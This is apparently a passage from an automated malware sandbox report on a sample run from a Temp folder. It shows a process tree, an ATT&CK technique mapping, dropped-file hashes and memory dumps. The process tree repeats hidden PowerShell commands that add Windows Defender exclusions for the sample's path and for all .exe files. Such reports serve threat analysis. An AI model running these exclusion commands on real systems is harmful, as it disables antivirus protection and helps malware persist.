    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    PID:872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:1936
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    PID:2320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    PID:1672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:2448
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:1008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    PID:1596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:1356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:1424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    PID:2316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    PID:308
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1612
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2152
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:3004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2260
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:2988

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
50ffd5380700b690911fa9131c736f1f

SHA1
df2a27a230f6d3882dba9c7d0bb758b58e78a442

SHA256
fcc6094efc2897dfae9779a739fd3a91af8dfe6aca6a53bab1d27cad2d3172c0

SHA512
d2f9ac5fb3251a93043d06e8e1df71b75940132c4a2b5468d2b60ce4222e534432636f4c5c0fc8485690966bac43ecdf83a1d2e8011eaeebb2a7b97c3ce50ece

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ed6025dae6e2251fcf8efd60b4fd1a10

SHA1
7f87a7fefdf3e52a384cbf8bf65b9987f0a03e6c

SHA256
9c7aa1da90f75e4453fea2c34e961bcc8ed826cc83de6dfb774b5bad52296930

SHA512
615abc868d10461deb180d7824f5b9052d4c1221cb559fd72d4ea3d81b0f274b9fa11a6c25777491cd43ce3f1142e66561ef22caae6a95841fee014172454e42

Download Submit
memory/2044-25-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2044-24-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2060-0-0x000007FEF5F33000-0x000007FEF5F34000-memory.dmp

Filesize
4KB

Download
memory/2060-1-0x0000000000800000-0x000000000082A000-memory.dmp

Filesize
168KB

Download
memory/2060-2-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

Filesize
9.9MB

Download
memory/2060-75-0x000007FEF5F33000-0x000007FEF5F34000-memory.dmp

Filesize
4KB

Download
memory/2060-86-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp

Filesize
9.9MB

Download
memory/2988-12-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2988-13-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download